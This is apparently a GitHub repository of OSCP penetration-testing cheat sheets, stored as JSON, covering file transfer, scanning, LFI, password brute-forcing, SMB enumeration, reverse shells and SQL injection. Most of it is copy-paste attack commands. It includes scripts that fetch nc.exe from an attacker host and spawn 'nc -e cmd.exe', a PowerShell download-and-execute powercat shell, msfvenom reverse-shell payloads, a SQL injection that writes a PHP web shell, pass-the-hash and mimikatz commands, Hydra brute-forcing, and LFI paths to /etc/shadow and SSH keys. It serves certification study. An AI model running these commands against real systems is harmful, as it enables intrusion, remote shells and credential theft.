[
  {
    "path": "File_Transfer",
    "content": "#With Curl\ncurl http://XX.XX.XX.XX/test.sh --output test.sh\n------------------------\n#Paste the following code to get nc in the victim:\necho open <attacker_ip> 21> ftp.txt\necho USER offsec>> ftp.txt\necho ftp>> ftp.txt\necho bin >> ftp.txt\necho GET nc.exe >> ftp.txt\necho bye >> ftp.txt\nftp -v -n -s:ftp.txt\nnc.exe <attacker_ip> 1234 -e cmd.exe\n------------------------\n#Bounce port scanning\n$ nc $ip 21\n220 Femitter FTP Server ready.\nUSER anonymous\n331 Password required for anonymous.\nPASS foo\n230 User anonymous logged in.\nPORT 127,0,0,1,0,80\n200 Port command successful.\nLIST\n------------------------\n#Nice trick to share folders with RDP:\n$ rdesktop (ip) -r disk:share=/home/bayo/store\n------------------------\n#With powershell:\n$ powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\\Users\\YOURUSER\\Desktop\\b.exe')\"\n------------------------\n#Paste the following block in a command line to get a web client:\necho strUrl = WScript.Arguments.Item(0) > wget.vbs\necho StrFile = WScript.Arguments.Item(1) >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs\necho Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs\necho Err.Clear >> wget.vbs\necho Set http = Nothing >> wget.vbs\necho Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"WinHttp.WinHttpRequest\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"MSXML2.ServerXMLHTTP\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"Microsoft.XMLHTTP\") >> wget.vbs\necho http.Open \"GET\",strURL,False >> wget.vbs\necho http.Send >> wget.vbs\necho varByteArray = http.ResponseBody >> wget.vbs\necho Set http = Nothing >> wget.vbs\necho Set fs = CreateObject(\"Scripting.FileSystemObject\") >> wget.vbs\necho Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs\necho strData = \"\" >> wget.vbs\necho strBuffer = \"\" >> wget.vbs\necho For lngCounter = 0 to UBound(varByteArray) >> wget.vbs\necho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs\necho Next >> wget.vbs\necho ts.Close >> wget.vbs\nRun with:\n$ cscript wget.vbs http://<attacker_ip>/nc.exe nc.exe\n"
  },
  {
    "path": "Index_Detection",
    "content": "#GOBUSTER\n• gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k\n------------------------\n#with ssl GOBUSTER\n• gobuster dir -u http://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster -k \n------------------------\n#DIRB\n• dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n------------------------\n#Davtest\n• davtest -url http://XX.XX.XX.XX\n------------------------\n#WPScan\n• wpscan --url https://omurugur.com/ --disable-tls-checks --enumerate p,t,u\n• wpscan --url  https://omurugur.com/ --disable-tls-checks --api-token <redacted>\n• wpscan --url  https://omurugur.com/  -e ap \n"
  },
  {
    "path": "LFI",
    "content": "#Useful LFI files (null byte)\n../../../../../etc/passwd%00\n....//....//....//....//....//etc/passwd%00\n..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\n------------------------\n#Linux:\n/etc/passwd\n/etc/shadow\n/etc/issue\n/etc/group\n/etc/hostname\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/root/.ssh/id_rsa\n/root/.ssh/authorized_keys\n/home/user/.ssh/authorized_keys\n/home/user/.ssh/id_rsa\n------------------------\n#Apache:\nConfiguration Files:\n/etc/apache2/apache2.conf\n/usr/local/etc/apache2/httpd.conf\n/etc/httpd/conf/httpd.conf\n------------------------\n#Log Files:\nRed Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log\nDebian/Ubuntu-   /var/log/apache2/access.log\nFreeBSD-   /var/log/httpd-access.log\n------------------------\n#Generic:\n/var/log/apache/access.log\n/var/log/apache/error.log\n/var/log/apache2/access.log\n/var/log/apache2/error.log\n------------------------\n#MySql:\n/var/lib/mysql/mysql/user.frm\n/var/lib/mysql/mysql/user.MYD\n/var/lib/mysql/mysql/user.MYI\n------------------------\n#Windows:\n/boot.ini\n/autoexec.bat\n/windows/system32/drivers/etc/hosts\n/windows/repair/SAM\n/windows/panther/unattended.xml\n/windows/panther/unattend/unattended.xml\n------------------------\n"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2021 Ömür Uğur\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "Password_Attack",
    "content": "#SSH Attack with THC-Hydra\n• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1\n------------------------\n#Remote Desktop Protocol Attack with Crowbar\n• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1\n------------------------\n#HTTP htaccess Attack with Medusa\n•  medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin\n------------------------\n#HTTP POST Attack with THC-Hydra\n• hydra XX.XX.XX.XX http-form-post \"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN\" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f\n"
  },
  {
    "path": "Port_Scan",
    "content": "#Nmap\n• nmap -sC -sV -O -iP\n• nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX\n• nmap -p- -v <targetip>\n• nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX\n------------------------\n#TCP Top 1000\n• nmap -Pn -sC -sV -oA tcp -vv $ip\n------------------------\n#All TCP Ports:\n• nmap -Pn -sC -sV -oA all -vv -p- $ip\n------------------------\n#UDP Top 100:\n• nmap -Pn -sU --top-ports 100 -oA udp -vv $ip\n• unicornscan -mU -v -I XX.XX.XX.XX\n------------------------\n#No Ping \n• nmap -sV -sC -O -Pn XX.XX.XX.XX\n------------------------\n#All Port \n• nmap -sV -sC -O -Pn  -p 1-65535 XX.XX.XX.XX\n------------------------\n#Nmap Detect And Write Stand-up Servers\n• nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt \n------------------------\n#UDP Scan\n• nmap --top-ports 200 -sU -A XX.XX.XX.XX\n------------------------\n#With Netcat\n• nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390\n"
  },
  {
    "path": "Port_Scan_By_Ports",
    "content": "#SSH\n• nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX\n------------------------\n#SNMP\n• sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt\n• snmpwalk -c public -v1 -t 10 XX.XX.XX.XX\n• snmp-check -t $ip -c public\n• nmap -sU -p161 --script \"snmp-*\" $ip\n------------------------\n#Enumerating Windows Users\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25\n------------------------\n#Enumerating Running Windows Processes\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2\n------------------------\n#Enumerating Open TCP Ports\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3\n------------------------\n#Enumerating Installed Software\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2\n------------------------\n#SMTP\n#telnet or netcat connection\n• nc <targetip> 25\n• VRFY root\n------------------------\n#Check for commands\n• nmap -script smtp-commands.nse <targetip>\n• nmap XX.XX.XX.XX -p 25 --script=smtp-*\n• nc -nv XX.XX.XX.XX 25\n------------------------\nCommand to check if a user exists\nVRFY root\nCommand to ask the server if a user belongs to a mailing list\nEXPN root\n------------------------\n#Always do users enumeration\n• smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip\n• smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt  -t $ip\n------------------------\n#SMB\n------------------------\n#Enumerate Hostname - nmblookup -A $ip\n• List Shares\n• smbmap -H $ip\n• echo exit | smbclient -L \\\\\\\\$ip\n• nmap --script smb-enum-shares -p 139,445 $ip\n• smbclient -N -L //XX.XX.XX.XX\n------------------------\n#Check Null Sessions\n• smbmap -H $ip\n• rpcclient -U \"\" -N $ip\n• smbclient -N -L \\\\\\\\XX.XX.XX.XX\\\\\n• smbclient \\\\\\\\$ip\\\\[share name]\n• smbclient -L XX.XX.XX.XX --option='client min protocol=NT1'\n• smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1'\n• smbclient \\\\\\\\XX.XX.XX.XX\\\\'bob share' --option='client min protocol=NT1'\n------------------------\n#Check for Vulnerabilities - \nnmap --script smb-vuln* -p 139,445 $ip\n------------------------\n#Overall Scan - \nenum4linux -a $ip\n------------------------\n#Manual Inspection\n• smbver.sh $ip (port)\n------------------------\n#rpcclient\n• rpcclient -U '' $ip\n• Password:\n• rpcclient $> srvinfo # operating system version\n• rpcclient $> netshareenumall # enumerate all shares and its paths\n• rpcclient $> enumdomusers # enumerate usernames defined on the server\n• rpcclient $> getdompwinfo # smb password policy configured on the server\n------------------------\n#CrackMapExec\n• crackmapexec -u 'guest' -p '' --shares $ip\n• crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip\n• crackmapexec -u 'guest' -p '' --users $ip\n• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd\n• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip # reliable pth code execution\n------------------------\n#smbmap\n• smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares\n• smbmap -u guest -p '' -H $ip\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesn't work\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # does not work\n------------------------\n# Share List:\n• smbclient --list <targetip>\n• smbclient -L <targetip>\n• smbclient -L //XX.XX.XX.XX\n------------------------\n# SMB Client:\n• smbclient //XX.XX.XX.XX/pathname\n• smbclient -L  //XX.XX.XX.XX\n------------------------\n# SMB Map:\n• smbmap -H XX.XX.XX.XX\n• smbmap -H XX.XX.XX.XX -R  --depth 5\n• smbmap -H htb.local -u <username> -p <password>\n------------------------\n# Check SMB vulnerabilities:\n• nmap --script=smb-check-vulns.nse <targetip> -p445\n• nmap --script vuln XX.XX.XX.XX -p445\n• nmap --script \"vuln\" <targetip> -p139,445\n------------------------\n# basic nmap scripts to enumerate shares and OS discovery\n• nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse,smb-os-discovery.nse\n• nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX\n------------------------\n# Connect using Username\n• smbclient -L <targetip> -U username -p 445\n------------------------\n# Connect to Shares\n• smbclient \\\\\\\\<targetip>\\\\ShareName\n• smbclient \\\\\\\\<targetip>\\\\ShareName -U User_name\n------------------------\n# enumerate with smb-shares, -a “do everything” option\n• enum4linux -a XX.XX.XX.XX\n• enum4linux -i XX.XX.XX.XX\n------------------------\n# learn the machine name and then enumerate with smbclient\n• nmblookup -A XX.XX.XX.XX\n• smbclient -L <server_name> -I XX.XX.XX.XX\n------------------------\n# DNS ENUM\n• dnsenum zonetransfer.me\n------------------------\n# DNS RECON\n• dnsrecon -d okmurugur.com -t axfr\n• dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8\n------------------------\n# DNS ENUMERATION\n• host www.okmurugur.com\n• host -t mx okmurugur.com\n• host -t txt okmurugur.com\n------------------------\n# DIG\n• dig axfr  @XX.XX.XX.XX okmurugur.com\n"
  },
  {
    "path": "README.md",
    "content": "<div class=\"Box-body\">\n        <article class=\"markdown-body entry-content p-5\" itemprop=\"text\"><h1><a id=\"user-content-birdwatcher\" class=\"anchor\" aria-hidden=\"true\" href=\"#CEH_v10_Dumps\"></a>OSCP ( Offensive Security Certified Professional )</h1>\n<p>\n\n<p>\n<b>Overview:</b>\n\nPenetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here.\n\nThis online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification.\n\nTo learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post.\n\n\nYou can read about my experience with the OSCP certification exam, which I took and passed in 2021, on my <a href=\"https://www.justsecnow.com/oscp-offensive-security-certified-professional-inceleme-ve-sinavi/\">site</a>. I wish success to the friends who will take the exam.\n\n\n<h2><a id=\"user-content-configuration\" class=\"anchor\" aria-hidden=\"true\" href=\"#References\"></a>References</h2>\n\n•\thttps://www.offensive-security.com/pwk-oscp/\n</p>\n\n\n<h2><a id=\"user-content-configuration\" class=\"anchor\" aria-hidden=\"true\" href=\"#Download\"></a>Download</h2>\n\n<h5>Cloning an Existing Repository ( Clone with HTTPS )</h5>\n<pre><code>\nroot@slife:~# git clone https://github.com/omurugur/OSCP.git\n</code></pre>\n<h5>Cloning an Existing Repository ( Clone with SSH )</h5>\n<pre><code>\nroot@slife:~# git clone git@github.com:omurugur/OSCP.git\n</code></pre>\n\n\n<h2><a id=\"user-content-configuration\" class=\"anchor\" aria-hidden=\"true\" href=\"#Contact\"></a>Contact</h2>\n\n<h5>Mail : omurugur12@gmail.com </h5>\n\n<h5>Linkedin  : https://www.linkedin.com/in/omurugur-sibergüvenlik/ </h5>\n\n<h5>GitHub  : https://github.com/omurugur </h5>\n\n<h5>Twitter  : https://twitter.com/omurugurrr </h5>\n\n<h5>Medium  : https://omurugur.medium.com/ </h5>\n</p>\n"
  },
  {
    "path": "Reverse_Shell",
    "content": "# Interactive TTY Shell\n• python -c 'import pty; pty.spawn(\"/bin/sh\")'\n• python -c 'import pty;pty.spawn(\"/bin/bash\")'\n• python -c 'import pty; pty.spawn(\"/bin/bash\")'\n• /usr/bin/script -qc /bin/bash /dev/null\n------------------------\n# With Powershell \n• powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd\"\n------------------------\n# Reverse Shell \n#Linux\n•msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f elf > shell.elf\n# PHP\n•msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.php\n# ASP\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp\n# WAR\n•msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f war > shell.war\n# JSP\n•msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.jsp\n# Exe\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=445 -f exe -o shell_reverse.exe\n# ASPX\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f aspx > shell.aspx\n# ASPX-x64 \n•msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=1234 -f aspx > 4.aspx\n------------------------\n#Shell From SQL Injection\n•windows\n?id=1 union all select 1,2,3,4,\"<?php echo shell_exec($_GET['cmd']);?>\",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'\n•linux\n?id=1 union all select 1,2,3,4,\"<?php echo shell_exec($_GET['cmd']);?>\",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'\n"
  },
  {
    "path": "Road_Map",
    "content": "\nNetwork Scanning\n\nService Scanning\n\n    WebApp\n      ☐   Nikto \n      ☐   dirb\n      ☐   dirbuster\n      ☐   wpscan\n      ☐   dotdotpwn\n      ☐   view source \n      ☐   davtest\\cadaver\n      ☐   droopescan\n      ☐   joomscan\n      ☐   LFI\\RFI Test\n      ☐   SQL injection\n      ☐   Default password search \n      \n    Linux\\Windows\n      ☒   snmpwalk -c public -v1 ipaddress 1\n      ☐   smbclient -L //ipaddress\n      ☐   showmount -e ipaddress port\n      ☐   rpcinfo\n      ☐   Enum4Linux\n    \n    Anything Else\n      ☐   nmap scripts (locate *nse* | grep servicename)\n      ☐   hydra\n      ☐   MSF Aux Modules\n      ☐   Download the software\n\nExploitation\n   ☐   Gather Version Numbers\n   ☐   Searchsploit\n   ☐   Default Creds\n   ☐   Creds Previously Gathered\n   ☐   Download the software\n\nPost Exploitation\n\n    Linux\n      ☐   linux-local-enum.sh\n      ☐   linuxprivchecker.py\n      ☐   linux-exploit-suggestor.sh\n      ☐   unix-privesc-check.py\n\n    Windows\n      ☐   wpc.exe\n      ☐   windows-exploit-suggestor.py\n      ☐   windows_privesc_check.py\n      ☐  windows-privesc-check2.exe\n\nPriv Escalation\n   ☐  access internal services (portfwd)\n   ☐  add account\n\nWindows\n   ☐  List of exploits\n\nLinux\n   ☐  sudo su \n   ☐  KernelDB\n   ☐  Searchsploit\n\nFinal\n   ☐  Screenshot of IPConfig\\WhoamI\n   ☐  Copy proof.txt\n   ☐  Dump hashes \n   ☐  Dump SSH Keys\n   ☐  Delete files\n"
  },
  {
    "path": "SQLi",
    "content": "#sqlmap\n☐ sqlmap -r name.txt --batch --force-ssl\n☐ sqlmap -r name.txt --dbms mysql --technique=U --dump  --batch\n☐ sqlmap -r name.txt --dbms mysql --technique=U --users\n☐ sqlmap -r name.txt --dbms mysql --technique=U  --passwords\n☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p \"id\" --dbms=mysql --dump\n☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p \"id\" --dbms=mysql --os-shell\n------------------------\n\n"
  },
  {
    "path": "Useful_Resources",
    "content": "Blog :\nMy experience with the OSCP certification — Security Café\nPWK and OSCP my experience | Fady Osman’s Technical Blog\nOffensive Security’s PWB and OSCP — My Experience — Security Sift\nPenetration Testing With Backtrack — OSCP — Things all the hacking\nPentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)\nOSCP Course and Exam Review — RCE Security\nTry Harder! An OSCP Review. Blog of Jason Bernier\nPentest Tips and Tricks — EK\nOpen Security Research: Using Mimikatz to Dump Passwords!\nHacking/OSCP cheatsheet :: Ceso Adventures\nThe CORE Hacking Course — YouTube\nUploading a web.config File for Fun and Profit | Soroush Dalili (@irsdl) — سروش دلیلی\nNetSecFocus Trophy Room — Google Drive\nEnumeration :\noscp/linux-template.md at master · xapax/oscp\noscp/windows-template.md at master · xapax/oscp\nCTF Series : Vulnerable Machines — tech.bitvijays.com\nPWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff\nnmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator\nPrivilege_Escalation_Windows:\nWindows Privilege Escalation Guide\nFuzzySecurity | Windows Privilege Escalation Fundamentals\nWindows elevation of privileges\n(1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube\nPowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit\nWindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum\nWindows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester\nWindows Privilege Escalation Methods for Pentesters — Pentest Blog\nWindows Local Privilege Escalation — HackTricks\nGhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.\nGhostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries\nhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1\nGhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.\nGhostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries\nprivilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite\nbitsadmin/wesng: Windows Exploit Suggester — Next Generation\nrasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities\nSecWiki/windows-kernel-exploits: windows-kernel-exploits, a collection of Windows privilege escalation vulnerabilities\nNeohapsis/creddump7\njuicy-potato/README.md at master · ohpe/juicy-potato\nantonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System\nitm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019\nPrivilege_Escalation_Linux:\nsagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop\nLinux elevation of privileges\nLinEnum/LinEnum.sh at master · rebootuser/LinEnum\nBasic Linux Privilege Escalation\nLinux Privilege Escalation Scripts\nLinux Privilege Escalation — HackTricks\ndiego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels\nLinux Privilege Escalation Using Cron Jobs\nrebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks\nlinted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script\nAlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac\nunix-privesc-check | pentestmonkey\njondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester\nPrivilege Escalation Methods in Linux Penetration Tests | SİBER GÜVENLİK PORTALİ\nReverse_Shell:\nreverseshell | pentestmonkey\nnetcat 1.11 for Win32/Win64\nUpgrading Simple Shells to Fully Interactive TTYs — ropnop blog\nSpawning a TTY Shell\nReverse Shell Cheat Sheet | pentestmonkey\nReverse Shell Cheat Sheet\nRemote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell\nBOF:\nPWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog\nExploiting the Stack-Based Buffer Overflow Vulnerability in Seattle Lab Mail (SLmail) 5.5 | SİBER GÜVENLİK PORTALİ\n(1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube\njustinsteven/dostackbufferoverflowgood\njessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course.\n(2) Immunity Debugger Overview — YouTube\nStack Based Buffer Overflow in Win 32 Platform: The Basics\nStack Buffer Overflow Vulnerability — PCMan FTP Server 2.0.7 | Ahmet GÜREL\nZero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]\nZero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows]\nBuffer Overflow — Easy Chat Server 3.1 — OnSecurity\nBuffer Overflow Exploit Development ~ BTRiskBlog: Everything About Pentest, ISO27001 and IT Audit\nCoalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows\nCoalfire — Coalfire Blog\nCustomized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium\nA Simple Buffer Overflow Using Vulnserver | by Z3R0th | Medium\nFinding Bad Characters with Immunity Debugger and Mona.py — Bulb Security\nminishare 1.4.1 exploit — YouTube\nSQLI:\nSQL-Injections · Security — My notepad\n44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf\nFull MSSQL Injection PWNage\nMSSQL Practical Injection Cheat Sheet — Perspective Risk\nSQL Injection Cheat Sheet | Netsparker\nÖner KAYA: Advanced SQL Injection Operations (Advanced Sql Injection)\nRed Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking\nSQL Injection Cheat Sheet | Bhanu Notes\nSQL-Injections · Total OSCP Guide\nSQL Tutorial\nLFI:\nHack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium\n(7) HackTheBox — Poison — YouTube\n"
  }
]